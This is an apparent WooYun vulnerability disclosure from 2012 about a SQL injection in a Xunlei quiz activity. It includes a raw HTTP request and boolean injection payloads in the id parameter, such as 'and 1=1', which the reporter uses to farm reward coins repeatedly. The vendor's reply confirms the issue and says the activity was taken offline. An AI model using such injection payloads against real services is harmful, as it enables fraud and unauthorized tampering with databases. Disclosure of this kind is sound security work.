当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011328

漏洞标题:迅雷"夺宝雷兵"疑似注入漏洞

相关厂商:迅雷

漏洞作者: popok

提交时间:2012-08-25 22:52

修复时间:2012-10-09 22:53

公开时间:2012-10-09 22:53

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-25: 细节已通知厂商并且等待厂商处理中
2012-08-27: 厂商已经确认,细节仅向厂商公开
2012-09-06: 细节向核心白帽子及相关领域专家公开
2012-09-16: 细节向普通白帽子公开
2012-09-26: 细节向实习白帽子公开
2012-10-09: 细节向公众公开

简要描述:

修改参数,即可无限刷分

详细说明:

GET /ppjy/?type=answer&id=62 or 6=1&answer=1&callback=jsonp1345702942308 HTTP/1.1
Host: dyactive.vip.xunlei.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.152 Safari/535.19 CoolNovo/2.0.3.52
Accept: */*
Referer: http://act.vip.xunlei.com/ppjy/
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie:这个不给了


id=62&answer=1
其中id是问题编号,answer就是问题答案,1是对,2是错
62号题答案是对,重复提交的话返回
jsonp1345702942308({"errno":-10,"msg":"您已经回答对了,不能再回答了!"});
其中题号貌似没有过滤
提交&id=62 and 2=1&answer=1,返回
jsonp1345702942308({"answer_con":null,"errno":-2,"msg":"回答错误,倒扣1个金币!"});
提交&id=62 and 1=1&answer=1,返回
jsonp1345702942308({"errno":2,"msg":"回答正确,奖励3个金币!"});
再次提交&id=62 and 1=1&answer=1,返回
jsonp1345702942308({"errno":-10,"msg":"您已经回答对了,不能再回答了!"});
换一下,提交&id=62 and 2=2&answer=1,返回
jsonp1345702942308({"errno":2,"msg":"回答正确,奖励3个金币!"});
所以重复提交and 1=1 ,2=2,3=3,......递增上去(或者用or),就可以用一道题无限刷分了。

漏洞证明:

不证明了,此活动很坑爹,满分是210分,前期爆出好多BUG,比如,一道题快速点N下答案,就会加N次分,兑换奖品时快速点N次兑换,就能兑换N个奖品。网上好多淫兑换了十几年VIP。后来有2B举报,然后全部回档了。然后迅雷修改代码,修复了BUG,去掉了VIP月卡奖品。现在本人随便看了下,又发现此漏洞。
负责此活动的程序员奖金应该无望了吧?

修复方案:

别修复了,这么坑爹的活动直接下线算了吧

版权声明:转载请注明来源 popok@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2012-08-27 11:29

厂商回复:

感谢反馈!

最新状态:

2012-08-29:感谢反馈!活动已经下线!我们会加强相关web研发人员的相关安全意识!我们有份礼物献上,请联系xlsec#xunlei.com!再次谢谢


漏洞评价:

评论